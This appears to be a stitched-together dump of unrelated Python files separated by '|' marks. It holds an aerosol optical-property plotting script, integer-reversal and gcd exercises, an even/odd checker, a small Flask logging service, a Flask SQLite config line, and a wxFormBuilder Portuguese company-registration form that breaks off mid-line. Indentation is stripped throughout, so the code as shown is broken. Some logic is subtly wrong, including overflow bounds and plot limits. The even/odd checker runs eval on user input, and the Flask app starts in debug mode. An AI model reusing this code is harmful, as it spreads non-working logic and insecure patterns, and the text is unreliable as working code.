print 'vol_sulfate = '+str(vols_orig[volspkdind])
print 'rh = '+str(rh_orig[rhpkdind])
mec_3im_t = mec_3im_orig[wlpkdind,volspkdind,volopkdind,:]
mec_3im = mec_3im_t[:,rhpkdind]
mec_2im_t = mec_2im_orig[wlpkdind,volspkdind,volopkdind,:]
mec_2im = mec_2im_t[:,rhpkdind]
mec_3cs_t = mec_3cs_orig[wlpkdind,volspkdind,volopkdind,:]
mec_3cs = mec_3cs_t[:,rhpkdind]
mec_2cs_t = mec_2cs_orig[wlpkdind,volspkdind,volopkdind,:]
mec_2cs = mec_2cs_t[:,rhpkdind]
units = fh_3im.variables['beta_e'].units
ssa_3im_t = ssa_3im_orig[wlpkdind,volspkdind,volopkdind,:]
ssa_3im = ssa_3im_t[:,rhpkdind]
ssa_2im_t = ssa_2im_orig[wlpkdind,volspkdind,volopkdind,:]
ssa_2im = ssa_2im_t[:,rhpkdind]
ssa_3cs_t = ssa_3cs_orig[wlpkdind,volspkdind,volopkdind,:]
ssa_3cs = ssa_3cs_t[:,rhpkdind]
ssa_2cs_t = ssa_2cs_orig[wlpkdind,volspkdind,volopkdind,:]
ssa_2cs = ssa_2cs_t[:,rhpkdind]
g_3im_t = g_3im_orig[wlpkdind,volopkdind,volspkdind,:]
g_3im = g_3im_t[:,rhpkdind]
g_2im_t = g_2im_orig[wlpkdind,volopkdind,volspkdind,:]
g_2im = g_2im_t[:,rhpkdind]
g_3cs_t = g_3cs_orig[wlpkdind,volopkdind,volspkdind,:]
g_3cs = g_3cs_t[:,rhpkdind]
g_2cs_t = g_2cs_orig[wlpkdind,volopkdind,volspkdind,:]
g_2cs = g_2cs_t[:,rhpkdind]
fh_3im.close()
fh_2im.close()
fh_3cs.close()
fh_2cs.close()
# Plot
import matplotlib.pyplot as plt
vol = volo_orig[volopkdind]
rh = rh_orig[rhpkdind]
area_t = 15 * (vol/40.)**2
area = np.zeros((vol.size,rh.size),float)
for i in np.arange(rh.size):
area[:,i] = area_t
color_t = rh
colors = np.zeros((vol.size,rh.size),float)
for i in np.arange(vol.size):
colors[i,:] = color_t
fig = plt.figure(figsize=(6,9))
#fig,axes = plt.subplots(nrows=3,ncols=2)
ax1=plt.subplot(3,2,1)
ax1.scatter(mec_2im, mec_3im, c=colors, cmap='RdYlBu', s=area, alpha=0.8,
linewidths=0.5, marker='o')
ax1.set_xlim([2, 18])
ax1.set_ylim([2, 18])
lims = [
np.min([plt.xlim(), plt.ylim()]),
np.max([plt.ylim(), plt.ylim()]),
]
ax1.plot(lims,lims,'k-',alpha=0.75,zorder=0)
ax1.set_ylabel('Homo. Mixing: BC+SUL+OC', fontsize=8)
ax1.set_title('Mass Extinction Coefficient ($m^2/g$)', fontsize=10)
ax1.set_xlabel('Homo. Mixing: BC+SUL only', fontsize=8)
ax1.set_aspect('equal')
plt.grid(True)
plt.tick_params(labelsize=7)
plt.subplot(3,2,2)
plt.scatter(mec_2cs, mec_3cs, c=colors, cmap='RdYlBu', s=area, alpha=0.8, linewidths=0.5, marker='v')
plt.ylabel('Core-shell Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Core-shel Mixing: BC+SUL only', fontsize=8)
plt.xlim([2, 18])
plt.ylim([2, 18])
lims = [
np.min([plt.xlim(), plt.ylim()]),
np.max([plt.ylim(), plt.ylim()]),
]
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.grid(True)
plt.tick_params(labelsize=7)
ax2 = plt.subplot(3,2,2)
ax2.set_aspect('equal')
plt.subplot(3,2,3)
plt.scatter(ssa_2im, ssa_3im, c=colors, cmap='RdYlBu', s=area, alpha=0.8, linewidths=0.5, marker='o')
plt.xlim([.3, 1.])
plt.ylim([.3, 1.])
lims = [
np.min([plt.xlim(), plt.ylim()]),
np.max([plt.ylim(), plt.ylim()]),
]
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.ylabel('Homo. Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Homo. Mixing: BC+SUL only', fontsize=8)
plt.title('Single Scattering Albedo', fontsize=10)
plt.grid(True)
plt.tick_params(labelsize=7)
ax3 = plt.subplot(3,2,3)
ax3.set_aspect('equal')
plt.subplot(3,2,4)
plt.scatter(ssa_2cs, ssa_3cs, c=colors, cmap='RdYlBu', s=area, alpha=0.8,
linewidths=0.5, marker='v')
plt.xlim([.3, 1.])
plt.ylim([.3, 1.])
lims = [
np.min([plt.xlim(), plt.ylim()]),
np.max([plt.ylim(), plt.ylim()]),
]
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.ylabel('Core-shell Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Core-shell Mixing: BC+SUL only', fontsize=8)
plt.grid(True)
plt.tick_params(labelsize=7)
ax4 = plt.subplot(3,2,4)
ax4.set_aspect('equal')
plt.subplot(3,2,5)
plt.scatter(g_2im, g_3im, c=colors, cmap='RdYlBu', s=area, alpha=0.8,
linewidths=0.5, marker='o')
plt.xlim([0.35, 0.85])
plt.ylim([0.35, 0.85])
lims = [
np.min([plt.xlim(), plt.ylim()]),
np.max([plt.ylim(), plt.ylim()]),
]
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.ylabel('Homo. Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Homo. Mixing: BC+SUL only', fontsize=8)
plt.title('Asymmetry Factor', fontsize=10)
plt.grid(True)
plt.tick_params(labelsize=7)
ax5 = plt.subplot(3,2,5)
ax5.set_aspect('equal')
plt.subplot(3,2,6)
im = plt.scatter(g_2cs, g_3cs, c=colors, cmap='RdYlBu', s=area, alpha=0.8,
linewidths=0.5, marker='v')
plt.xlim([0.35, 0.85])
plt.ylim([0.35, 0.85])
lims = [
np.min([plt.xlim(), plt.ylim()]),
np.max([plt.ylim(), plt.ylim()]),
]
plt.tick_params(labelsize=7)
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.ylabel('Core-shell Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Core-shell Mixing: BC+SUL only', fontsize=8)
plt.grid(True)
ax6 = plt.subplot(3,2,6)
ax6.set_aspect('equal')
plt.tight_layout()
fig.subplots_adjust(bottom=0.13)
cax = fig.add_axes([0.13, 0.05, 0.8, 0.015])
cbar = fig.colorbar(im,cax=cax,ticks=rhpkd,orientation='horizontal')
cbar.solids.set_edgecolor("face")
cbar.set_label("RH (%)")
plt.savefig('radppt_3spec_'+str(volspkd)+'%sul.pdf',format='pdf')
#plt.show()
|
class Solution:
def reverse(self, x):
print(0.75%10)
a=str(x)
if a[0]=='-':
b=a[::-1]
if (int(b[:-1:])*-1) < -2147483648:
return 0
else:
return (int(b[:-1:])*-1)
else:
if (int(a[::-1]))>2147483648:
return 0
else:
return (int(a[::-1]))
class Solution2:
def reverse(self, x: int) -> int:
if x==0:
return 0
s=''
neg=False
if x<0:
neg=True
x*=-1
while x>0:
s+=str(x%10)
x=x//10
s=int(s)
if s>2**31:
return 0
if neg:
return s*-1
return (s)
|
#WAP to accept a number and check if it's even or odd without using arithmetic operators
def IsOdd(num):
if((num & 1) == 0):
return False
else:
return True
def main():
inputNum = eval(input('Please enter a number: '))
print('Number is Odd: ', IsOdd(inputNum))
if __name__ == '__main__':
main() |
# Find the greatest common divisor of two numbers using recursion.
def gcd(n1, n2):
if n1 > n2:
if n1 % n2 == 0:
return n2
else:
return gcd(n2, n1 % n2)
else:
if n2 % n1 == 0:
return n1
else:
return gcd(n1, n2 % n1)
print(gcd(24, 54)) |
#!remote-logger/bin/python
from flask import Flask, request, abort, jsonify
from collector_logger import logger
app = Flask(__name__)
@app.route('/')
def index():
return "Hello, World!"
@app.route('/log', methods=['POST'])
def add_record():
if not request.json or 'content' not in request.json:
abort(400)
content = request.json['content']
logger.info(content)
return '', 204
@app.errorhandler(400)
def bad_req_body(error):
return jsonify({'message': 'No content!'}), 400
if __name__ == '__main__':
app.run(port=5880,
debug=True)
|
import os
from flask import g, current_app
# ...
current_app.config['SQLALCHEMY_DATABASE_URI'] = \
'sqlite:////' + os.path.join(g.app.root_path, 'data.db') |
# -*- coding: utf-8 -*-
###########################################################################
## Python code generated with wxFormBuilder (version Jun 17 2015)
## http://www.wxformbuilder.org/
##
## PLEASE DO "NOT" EDIT THIS FILE!
###########################################################################
import wx
import wx.xrc
import wx.grid
###########################################################################
## Class TEREMP
###########################################################################
class TEREMP ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Cadastro de Empresas", pos = wx.DefaultPosition, size = wx.Size( 1064,730 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )
self.tb_geral = self.CreateToolBar( 0, wx.ID_ANY )
self.bt_buscar = self.tb_geral.AddLabelTool( wx.ID_FIND, u"Localizar registro", wx.Bitmap( u"icons/ac_buscar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
self.bt_adicionar = self.tb_geral.AddLabelTool( wx.ID_ADD, u"Novo", wx.Bitmap( u"icons/ac_adicionar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
self.bt_editar = self.tb_geral.AddLabelTool( wx.ID_EDIT, u"Alterar registro", wx.Bitmap( u"icons/ac_editar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
self.tb_geral.AddSeparator()
self.bt_confirmar = self.tb_geral.AddLabelTool( wx.ID_APPLY, u"Salvar modificações", wx.Bitmap( u"icons/ac_confirmar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
self.bt_cancelar = self.tb_geral.AddLabelTool( wx.ID_ABORT, u"Cancelar alterações", wx.Bitmap( u"icons/ac_cancelar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
self.tb_geral.AddSeparator()
self.bt_sair = self.tb_geral.AddLabelTool( wx.ID_CLOSE, u"tool", wx.Bitmap( u"icons/ac_sair_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
self.tb_geral.Realize()
lay_corpo = wx.BoxSizer( wx.VERTICAL )
lay_cabecalho = wx.BoxSizer( wx.HORIZONTAL )
self.lb_codigo = wx.StaticText( self, wx.ID_ANY, u"Código:", wx.DefaultPosition, wx.Size( 60,26 ), 0 )
self.lb_codigo.Wrap( -1 )
lay_cabecalho.Add( self.lb_codigo, 0, wx.ALL, 5 )
self.tc_codigo = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
lay_cabecalho.Add( self.tc_codigo, 0, wx.ALL, 5 )
self.lb_nome = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 300,26 ), 0 )
self.lb_nome.Wrap( -1 )
self.lb_nome.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
lay_cabecalho.Add( self.lb_nome, 0, wx.ALL, 5 )
self.lb_tipo = wx.StaticText( self, wx.ID_ANY, u"Tipo:", wx.DefaultPosition, wx.Size( 100,26 ), wx.ALIGN_RIGHT )
self.lb_tipo.Wrap( -1 )
lay_cabecalho.Add( self.lb_tipo, 0, wx.ALL, 5 )
cb_tipoChoices = [ u"PF", u"PJ" ]
self.cb_tipo = wx.ComboBox( self, wx.ID_ANY, u"PF", wx.DefaultPosition, wx.DefaultSize, cb_tipoChoices, 0 )
self.cb_tipo.Enable( False )
lay_cabecalho.Add( self.cb_tipo, 0, wx.ALL, 5 )
self.lb_situacao = wx.StaticText( self, wx.ID_ANY, u"Situação:", wx.DefaultPosition, wx.Size( 100,-1 ), wx.ALIGN_RIGHT )
self.lb_situacao.Wrap( -1 )
lay_cabecalho.Add( self.lb_situacao, 0, wx.ALL, 5 )
cb_situacaoChoices = [ u"Ativo", u"Análise", u"Bloqueado", u"Saneamento", u"Cancelado" ]
self.cb_situacao = wx.ComboBox( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, cb_situacaoChoices, 0 )
self.cb_situacao.Enable( False )
lay_cabecalho.Add( self.cb_situacao, 0, wx.ALL, 5 )
lay_corpo.Add( lay_cabecalho, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 )
lay_guias = wx.BoxSizer( wx.VERTICAL )
self.nb_dados = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
self.pn_dados_basicos = wx.Panel( self.nb_dados, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,-1 ), 0 )
lay_dados_basicos = wx.BoxSizer( wx.VERTICAL )
lay_basico_dados1 = wx.BoxSizer( wx.HORIZONTAL )
lay_cadastrais = wx.StaticBoxSizer( wx.StaticBox( self.pn_dados_basicos, wx.ID_ANY, u"Informações Cadastrais" ), wx.HORIZONTAL )
lay_cad_lab1 = wx.BoxSizer( wx.VERTICAL )
self.lb_nome_formal = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Nome formal:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_nome_formal.Wrap( -1 )
lay_cad_lab1.Add( self.lb_nome_formal, 0, wx.ALL, 5 )
self.lb_nome_alternativo = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Nome alternativo:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_nome_alternativo.Wrap( -1 )
lay_cad_lab1.Add( self.lb_nome_alternativo, 0, wx.ALL, 5 )
self.lb_logradouro = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Logradouro:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_logradouro.Wrap( -1 )
lay_cad_lab1.Add( self.lb_logradouro, 0, wx.ALL, 5 )
self.lb_numero = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Número:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_numero.Wrap( -1 )
lay_cad_lab1.Add( self.lb_numero, 0, wx.ALL, 5 )
self.lb_bairro = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Bairro:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_bairro.Wrap( -1 )
lay_cad_lab1.Add( self.lb_bairro, 0, wx.ALL, 5 )
self.lb_municipio = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Município:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_municipio.Wrap( -1 )
lay_cad_lab1.Add( self.lb_municipio, 0, wx.ALL, 5 )
self.lb_estado = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Estado:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_estado.Wrap( -1 )
lay_cad_lab1.Add( self.lb_estado, 0, wx.ALL, 5 )
lay_cadastrais.Add( lay_cad_lab1, 0, wx.EXPAND, 5 )
lay_cad_text1 = wx.BoxSizer( wx.VERTICAL )
self.tc_nome_formal = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
self.tc_nome_formal.Enable( False )
lay_cad_text1.Add( self.tc_nome_formal, 0, wx.ALL, 5 )
self.tc_nome_alternativo = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
self.tc_nome_alternativo.Enable( False )
lay_cad_text1.Add( self.tc_nome_alternativo, 0, wx.ALL, 5 )
self.tc_logradouro = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
self.tc_logradouro.Enable( False )
lay_cad_text1.Add( self.tc_logradouro, 0, wx.ALL, 5 )
self.tc_numero = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 90,26 ), 0 )
self.tc_numero.Enable( False )
lay_cad_text1.Add( self.tc_numero, 0, wx.ALL, 5 )
self.tc_bairro = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 200,26 ), 0 )
self.tc_bairro.Enable( False )
lay_cad_text1.Add( self.tc_bairro, 0, wx.ALL, 5 )
self.tc_municipio = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
self.tc_municipio.Enable( False )
lay_cad_text1.Add( self.tc_municipio, 0, wx.ALL, 5 )
cb_estadoChoices = [ u"MT", u"MS", u"MG", u"RJ", u"RG", u"RN", u"RR", u"ES", u"SP", u"SC", u"PR", u"PI", u"BA" ]
self.cb_estado = wx.ComboBox( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,26 ), cb_estadoChoices, 0 )
self.cb_estado.Enable( False )
lay_cad_text1.Add( self.cb_estado, 0, wx.ALL, 5 )
lay_cadastrais.Add( lay_cad_text1, 1, wx.EXPAND, 5 )
lay_basico_dados1.Add( lay_cadastrais, 0, wx.EXPAND|wx.TOP, 0 )
lay_caracteristicas = wx.StaticBoxSizer( wx.StaticBox( self.pn_dados_basicos, wx.ID_ANY, u"Características" ), wx.VERTICAL )
lay_carac_lab1 = wx.BoxSizer( wx.VERTICAL )
lay_caracteristicas.Add( lay_carac_lab1, 0, wx.EXPAND, 5 )
lay_carac_text1 = wx.BoxSizer( wx.VERTICAL )
lay_caracteristicas.Add( lay_carac_text1, 0, wx.EXPAND, 5 )
lay_basico_dados1.Add( lay_caracteristicas, 1, wx.EXPAND, 5 )
lay_dados_basicos.Add( lay_basico_dados1, 1, wx.EXPAND, 5 )
lay_registros = wx.StaticBoxSizer( wx.StaticBox( self.pn_dados_basicos, wx.ID_ANY, u"Registros" ), wx.HORIZONTAL )
lay_reg_lab1 = wx.BoxSizer( wx.VERTICAL )
lay_registros.Add( lay_reg_lab1, 0, wx.EXPAND, 5 )
lay_reg_lab2 = wx.BoxSizer( wx.VERTICAL )
lay_registros.Add( lay_reg_lab2, 1, wx.EXPAND, 5 )
lay_dados_basicos.Add( lay_registros, 1, wx.EXPAND, 5 )
self.pn_dados_basicos.SetSizer( lay_dados_basicos )
self.pn_dados_basicos.Layout()
lay_dados_basicos.Fit( self.pn_dados_basicos )
self.nb_dados.AddPage( self.pn_dados_basicos, u"Dados Básicos", True )
self.pn_comunicacao = wx.Panel( self.nb_dados, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
lay_comunicacao = wx.BoxSizer( wx.VERTICAL )
lay_contatos = wx.StaticBoxSizer( wx.StaticBox( self.pn_comunicacao, wx.ID_ANY, u"Contatos" ), wx.VERTICAL )
lay_comunicacao.Add( lay_contatos, 1, wx.EXPAND|wx.TOP, 5 )
bSizer8 = wx.BoxSizer( wx.HORIZONTAL )
lay_email = wx.StaticBoxSizer( wx.StaticBox( self.pn_comunicacao, wx.ID_ANY, u"Correio eletrônico" ), wx.VERTICAL )
bSizer8.Add( lay_email, 1, wx.EXPAND, 5 )
lay_enderecos = wx.StaticBoxSizer( wx.StaticBox( self.pn_comunicacao, wx.ID_ANY, u"Endereços" ), wx.VERTICAL )
bSizer8.Add( lay_enderecos, 1, wx.EXPAND, 5 )
lay_comunicacao.Add( bSizer8, 1, wx.EXPAND, 5 )
self.pn_comunicacao.SetSizer( lay_comunicacao )
self.pn_comunicacao.Layout()
lay_comunicacao.Fit( self.pn_comunicacao )
self.nb_dados.AddPage( self.pn_comunicacao, u"Comunicação", False )
self.pn_fiscal = wx.Panel( self.nb_dados, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
self.nb_dados.AddPage( self.pn_fiscal, u"Dados Fiscais", False )
self.pn_socios = wx.Panel( self.nb_dados, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
lay_socios = wx.BoxSizer( wx.VERTICAL )
self.pn_lista_socios = wx.Panel( self.pn_socios, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer20 = wx.BoxSizer( wx.VERTICAL )
lay_total = wx.BoxSizer( wx.VERTICAL )
lay_label = wx.BoxSizer( wx.HORIZONTAL )
self.lb_quotas = wx.StaticText( self.pn_lista_socios, wx.ID_ANY, u"Total de Quotas", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_CENTRE )
self.lb_quotas.Wrap( -1 )
lay_label.Add( self.lb_quotas, 0, wx.ALL, 5 )
self.lb_capital = wx.StaticText( self.pn_lista_socios, wx.ID_ANY, u"Capital Total", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_CENTRE )
self.lb_capital.Wrap( -1 )
lay_label.Add( self.lb_capital, 0, wx.ALL, 5 )
lay_total.Add( lay_label, 1, wx.EXPAND, 5 )
lay_campos = wx.BoxSizer( wx.HORIZONTAL )
self.tc_quotas = wx.TextCtrl( self.pn_lista_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), wx.TE_RIGHT )
lay_campos.Add( self.tc_quotas, 0, wx.ALL, 5 )
self.tc_capital = wx.TextCtrl( self.pn_lista_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), wx.TE_RIGHT )
lay_campos.Add( self.tc_capital, 0, wx.ALL, 5 )
lay_total.Add( lay_campos, 1, wx.EXPAND, 5 )
bSizer20.Add( lay_total, 0, wx.EXPAND, 5 )
lay_tabela = wx.BoxSizer( wx.VERTICAL )
self.gd_socios = wx.grid.Grid( self.pn_lista_socios, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
# Grid
self.gd_socios.CreateGrid( 0, 8 )
self.gd_socios.EnableEditing( False )
self.gd_socios.EnableGridLines( False )
self.gd_socios.EnableDragGridSize( False )
self.gd_socios.SetMargins( 0, 0 )
# Columns
self.gd_socios.SetColSize( 0, 50 )
self.gd_socios.SetColSize( 1, 50 )
self.gd_socios.SetColSize( 2, 90 )
self.gd_socios.SetColSize( 3, 400 )
self.gd_socios.SetColSize( 4, 120 )
self.gd_socios.SetColSize( 5, 100 )
self.gd_socios.SetColSize( 6, 100 )
self.gd_socios.SetColSize( 7, 100 )
self.gd_socios.EnableDragColMove( False )
self.gd_socios.EnableDragColSize( False )
self.gd_socios.SetColLabelSize( 30 )
self.gd_socios.SetColLabelAlignment( wx.ALIGN_CENTRE, wx.ALIGN_CENTRE )
# Rows
self.gd_socios.EnableDragRowSize( True )
self.gd_socios.SetRowLabelSize( 30 )
self.gd_socios.SetRowLabelAlignment( wx.ALIGN_CENTRE, wx.ALIGN_CENTRE )
# Label Appearance
# Cell Defaults
self.gd_socios.SetDefaultCellAlignment( wx.ALIGN_LEFT, wx.ALIGN_TOP )
lay_tabela.Add( self.gd_socios, 1, wx.EXPAND, 5 )
bSizer20.Add( lay_tabela, 1, wx.EXPAND, 5 )
self.pn_lista_socios.SetSizer( bSizer20 )
self.pn_lista_socios.Layout()
bSizer20.Fit( self.pn_lista_socios )
lay_socios.Add( self.pn_lista_socios, 1, wx.EXPAND |wx.ALL, 5 )
self.pn_form_socios = wx.Panel( self.pn_socios, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
self.pn_form_socios.Hide()
lay_form_soc = wx.BoxSizer( wx.HORIZONTAL )
lay_label_soc1 = wx.BoxSizer( wx.VERTICAL )
self.lb_empresa = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Empresa:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_empresa.Wrap( -1 )
lay_label_soc1.Add( self.lb_empresa, 0, wx.ALL, 5 )
self.lb_soc_codigo = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Código:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_soc_codigo.Wrap( -1 )
lay_label_soc1.Add( self.lb_soc_codigo, 0, wx.ALL, 5 )
self.lb_soc_situacao = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Situação:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_soc_situacao.Wrap( -1 )
lay_label_soc1.Add( self.lb_soc_situacao, 0, wx.ALL, 5 )
self.lb_soc_nome = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Nome do Sócio:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_soc_nome.Wrap( -1 )
lay_label_soc1.Add( self.lb_soc_nome, 0, wx.ALL, 5 )
self.lc_soc_federal = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Cadastro Federal:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lc_soc_federal.Wrap( -1 )
lay_label_soc1.Add( self.lc_soc_federal, 0, wx.ALL, 5 )
self.lb_soc_capital = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Capital Integralizado:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_soc_capital.Wrap( -1 )
lay_label_soc1.Add( self.lb_soc_capital, 0, wx.ALL, 5 )
self.lb_soc_quotas = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Qtde. de Quotas:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_soc_quotas.Wrap( -1 )
lay_label_soc1.Add( self.lb_soc_quotas, 0, wx.ALL, 5 )
self.lb_soc_vquota = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Valor da Quota:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
self.lb_soc_vquota.Wrap( -1 )
lay_label_soc1.Add( self.lb_soc_vquota, 0, wx.ALL, 5 )
lay_form_soc.Add( lay_label_soc1, 0, wx.EXPAND, 5 )
lay_text_soc1 = wx.BoxSizer( wx.VERTICAL )
self.tc_soc_empresa = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,26 ), 0 )
self.tc_soc_empresa.Enable( False )
lay_text_soc1.Add( self.tc_soc_empresa, 0, wx.ALL, 5 )
self.tc_soc_codigo = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,26 ), 0 )
self.tc_soc_codigo.Enable( False )
lay_text_soc1.Add( self.tc_soc_codigo, 0, wx.ALL, 5 )
cb_soc_situacaoChoices = [ u"Ativo", u"Análise", u"Bloqueado", u"Saneamento", u"Cancelado" ]
self.cb_soc_situacao = wx.ComboBox( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 150,26 ), cb_soc_situacaoChoices, 0 )
self.cb_soc_situacao.Enable( False )
lay_text_soc1.Add( self.cb_soc_situacao, 0, wx.ALL, 5 )
self.tc_soc_nome = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
self.tc_soc_nome.Enable( False )
lay_text_soc1.Add( self.tc_soc_nome, 0, wx.ALL, 5 )
self.tc_soc_federal = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 200,26 ), 0 )
self.tc_soc_federal.Enable( False )
lay_text_soc1.Add( self.tc_soc_federal, 0, wx.ALL, 5 )
self.tc_soc_capital = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), 0 )
self.tc_soc_capital.Enable( False )
lay_text_soc1.Add( self.tc_soc_capital, 0, wx.ALL, 5 )
self.tc_soc_quotas = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), 0 )
self.tc_soc_quotas.Enable( False )
lay_text_soc1.Add( self.tc_soc_quotas, 0, wx.ALL, 5 )
self.tc_soc_vquota = wx.TextCtrl( self.pn_form_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), 0 )
self.tc_soc_vquota.Enable( False )
lay_text_soc1.Add( self.tc_soc_vquota, 0, wx.ALL, 5 )
lay_form_soc.Add( lay_text_soc1, 1, wx.EXPAND, 5 )
self.pn_form_socios.SetSizer( lay_form_soc )
self.pn_form_socios.Layout()
lay_form_soc.Fit( self.pn_form_socios )
lay_socios.Add( self.pn_form_socios, 1, wx.EXPAND |wx.ALL, 5 )
lay_botao = wx.BoxSizer( wx.HORIZONTAL )
self.bt_soc_consultar = wx.BitmapButton( self.pn_socios, wx.ID_ANY, wx.Bitmap( u"icons/ac_buscar_16x16.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
